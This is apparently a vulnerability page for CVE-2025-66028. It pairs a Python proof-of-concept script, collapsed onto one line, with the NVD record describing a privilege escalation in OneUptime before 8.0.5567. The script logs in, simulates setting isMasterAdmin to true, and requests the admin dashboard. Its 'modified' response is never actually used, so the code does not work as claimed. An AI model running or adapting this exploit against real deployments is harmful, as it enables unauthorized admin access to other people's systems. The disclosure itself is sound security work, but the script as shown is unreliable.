CVE-2025-66028

import requests import json # CVE-2025-66028 PoC - OneUptime Privilege Escalation via Login Response Manipulation # Target: OneUptime < 8.0.5567 TARGET_URL = "https://vulnerable-server.com" LOGIN_ENDPOINT = f"{TARGET_URL}/api/account/login" DASHBOARD_ENDPOINT = f"{TARGET_URL}/api/admin/dashboard" def exploit_privilege_escalation(username, password): """ Exploit the login response manipulation vulnerability to gain admin access. Steps: 1. Send normal login request 2. Intercept and modify the response 3. Change isMasterAdmin from false to true 4. Access admin dashboard with elevated privileges """ # Step 1: Normal login request login_data = { "email": username, "password": password } try: # Send login request (in real attack, use proxy to intercept) response = requests.post(LOGIN_ENDPOINT, json=login_data, verify=False) if response.status_code == 200: login_result = response.json() # Step 2: Modify the response - this is where the vulnerability lies # In real attack, intercept using Burp Suite/ZAP and change: # "isMasterAdmin": false -> "isMasterAdmin": true print("[*] Original response:", json.dumps(login_result, indent=2)) # Simulating modified response (in practice, modify at proxy level) modified_result = login_result.copy() modified_result["isMasterAdmin"] = True print("[+] Modified response:", json.dumps(modified_result, indent=2)) print("[+] isMasterAdmin changed to: True") # Step 3: Use the modified response to access admin resources # In practice, use the modified session/token to access admin endpoints admin_check = requests.get( DASHBOARD_ENDPOINT, headers={"Authorization": f"Bearer {login_result.get('token', '')}"} ) if admin_check.status_code == 200: print("[+] Successfully accessed admin dashboard!") print("[+] Privilege escalation successful") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-66028 OneUptime Privilege Escalation PoC") print("=" * 60) # Replace with valid credentials username = "[email protected]" password = "userpassword" exploit_privilege_escalation(username, password)

{"cve": {"id": "CVE-2025-66028", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:52.110", "lastModified": "2025-12-05T13:57:23.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is a solution for monitoring and managing online services. Prior to version 8.0.5567, OneUptime is vulnerable to privilege escalation via Login Response Manipulation. During the login process, the server response included a parameter called isMasterAdmin. By intercepting and modifying this parameter value from false to true, it is possible to gain access to the admin dashboard interface. However, an attacker may be unable to view or interact with the data if they still do not have sufficient permissions. This issue has been patched in version 8.0.5567."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.5567", "matchCriteriaId": "E9E265FD-6677-423D-A90A-15BC6B5763EC"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/3e72b2a9a4f50f98cf1f6cf13fa3e405715bb370", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-675q-66gf-gqg8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}